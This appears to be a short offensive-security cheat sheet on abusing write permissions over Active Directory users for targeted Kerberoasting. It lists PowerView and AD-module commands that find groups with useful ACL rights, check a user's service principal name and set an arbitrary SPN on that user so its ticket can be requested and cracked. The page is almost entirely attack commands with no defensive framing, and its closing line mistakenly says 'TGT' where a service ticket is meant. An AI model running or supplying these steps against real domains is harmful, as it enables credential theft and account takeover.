Abusing Set SPN ACL To Kerberoasting
Enumerating the permission for a Group On ACLs (Using PowerView_Dev):
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
To Check that a user has a not a SPN
Get-DomainUser -Identity aduser | select serviceprincipalname
Using Active Directory module:
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName
Set a SPN for the user (must be unique for the domain):
Set-DomainObject -Identity aduser -Set @{serviceprincipalname='ops/whatever1'}
Using Active Directory module:
Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='ops/whatever1'}
Now Follow the same process to Get a TGT
Last updated